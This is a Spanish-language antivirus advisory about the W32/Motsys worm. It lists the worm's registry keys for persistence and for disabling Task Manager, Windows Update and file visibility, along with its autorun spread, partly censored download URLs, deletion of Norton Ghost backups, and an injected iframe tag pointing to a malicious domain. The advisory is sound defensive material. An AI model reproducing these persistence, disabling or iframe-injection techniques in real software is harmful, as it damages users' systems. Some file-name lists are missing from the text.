|
W32/Motsys
Motsys es un gusano reportado el 15 de Noviembre 2007, que se propaga vía HTTP a través del puerto TCP 80Infecta las unidades de disco removibles. Crea sub-llaves de registro que alteran el funcionamiento y desestabilizan el sistema.
Intenta descargar archivos infectados desde dominios ubicados en China, borra archivos relacionados al Norton Ghost y finalmente inserta una etiqueta <iframe> a archivos con extensiones .html y otros.
Infecta Windows 98/NT/Me/2000/XP/Vista y Server 2003, está desarrollado en Visual C++ con extensión variable.
Al activarse se copia a la carpeta %System% con los nombres de archivos:
Para ejecutarse la próxima vez que se re-inicie el sistema crea la llave de registro:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"crsss" = "%System%\Systom.exe"
Para desestabilizar la seguridad del sistema crea la llave:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue" = "0"
System% es la variable C:\Windows\System para Windows 95/98/Me, C:\Winnt\System32 para Windows NT/2000 y C:\Windows\System32 para Windows XP y Windows Server 2003.
Al siguiente inicio del equipo, para deshabilitar el Administrador de la Barra de Tareas
crea la sub-llave:
[HKEY_USERS\S-1-5-21-1150637735-552541835-915212665-500\Software\Microsoft\Windows\
CurrentVersion\Policies\System]
"DisableTaskMgr" = "1"
Para deshabilitar el acceso a la Actualización de Windows crea la
sub-llave:
[HKEY_USERS\S-1-5-21-1150637735-552541835-915212665-500\Software\Microsoft\Windows\
CurrentVersion\Policies\WindowsUpdate]
"DisableWindowsUpdateAccess" = "1"
Para deshabilitar algunas funciones del Explorador de
Windows crea las sub-llaves:
[HKEY_USERS\S-1-5-21-1150637735-552541835-915212665-500\Software\Microsoft\Windows\
CurrentVersion\Explorer\Advanced]
"Hidden" = "0"
[HKEY_USERS\S-1-5-21-1150637735-552541835-915212665-500\Software\Microsoft\Windows\
CurrentVersion\Explorer\Advanced]
"HideFileExt" = "1"
Infecta los dispositivos de almacenamiento removibles con los archivos:
%Unidad_de_disco%\sos.exe
%Unidad_de_disco%\Systom.exe
Y para infectar a través de dispositivos removibles en caso de ser usados en otros equipos se copia a:
%Unidad_de_disco%\auToRun.inf
Luego se conecta a los siguientes dominios y rutas ubicados en China, para descargar archivos infectados:
http://www.ip127.cn/lm/xz/[Censurado]
http://www.xinyouyu.cn/xxx/[Censurado]
http://www.ip127.cn/lm/xz/[Censurado]
http://www.ip127.cn/lm/xz/tj.[Censurado]
Borra los archivos con extensión .gho, asociados al Norton Ghost, en caso existir en los sistema infectados.
Y agrega la siguiente etiqueta <iframe> a todos los archivos con extensión .html:
<Iframe src=http://www.ip127.cn/lm/wm/inde[Censurado] width=50 height=0></Iframe>
agrega además la misma etiqueta <iframe> a todos los archivos con los siguientes nombres:
Las sub-llaves de registro creadas desetabilizan el sistema y deshabilitan funciones.
PER ANTIVIRUS® versión 10.3 con registro de virus al 15 de Noviembre 2007 detecta y elimina eficientemente este gusano.
